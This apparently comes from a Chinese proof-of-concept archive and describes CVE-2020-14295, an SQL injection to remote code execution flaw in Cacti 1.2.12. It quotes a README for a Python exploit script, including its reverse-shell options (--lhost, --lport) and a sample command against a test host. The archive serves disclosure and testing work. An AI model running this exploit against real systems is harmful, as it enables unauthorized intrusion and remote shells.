关联漏洞
标题:
Cacti SQL注入漏洞
(CVE-2020-14295)
描述:Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。 Cacti 1.2.12版本中的color.php文件存在SQL注入漏洞。远程攻击者可借助‘filter’参数利用该漏洞执行任意命令。
描述
Proof of Concept for CVE-2020-14295.
介绍
# CVE-2020-14295
CVE-2020-14295 proof of concept. The original post can be found at [exploit-db](https://www.exploit-db.com/exploits/49810).
## Install requirements
```
python3 -m pip install -r requirements.txt
```
## Usage
```
$ python3 cacti_sqli_rce.py --help
usage: cacti_sqli_rce.py [-h] -t <target/host URL> -u <user> -p <password>
--lhost <lhost> --lport <lport>
[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution
optional arguments:
-h, --help show this help message and exit
-t <target/host URL> target/host URL, example: http://192.168.15.58
-u <user> user to log in
-p <password> user's password
--lhost <lhost> your IP address
--lport <lport> your listening port
```
```
$ python3 cacti_sqli_rce.py -t http://cacti-test.localdomain -u admin -p password --lhost 127.0.0.1 --lport 9001
```
## References
* [GitHub Issue](https://github.com/Cacti/cacti/issues/3622)
* [NIST](https://nvd.nist.gov/vuln/detail/CVE-2020-14295)
* [MITRE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295)
文件快照
[4.0K] /data/pocs/a7fddda4d6b50ca08160dc068ff5b41b2f5b5fb0
├── [ 24M] cacti-1.2.12.tar.gz
├── [3.2K] cacti_sqli_rce.py
├── [1.1K] README.md
└── [ 149] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。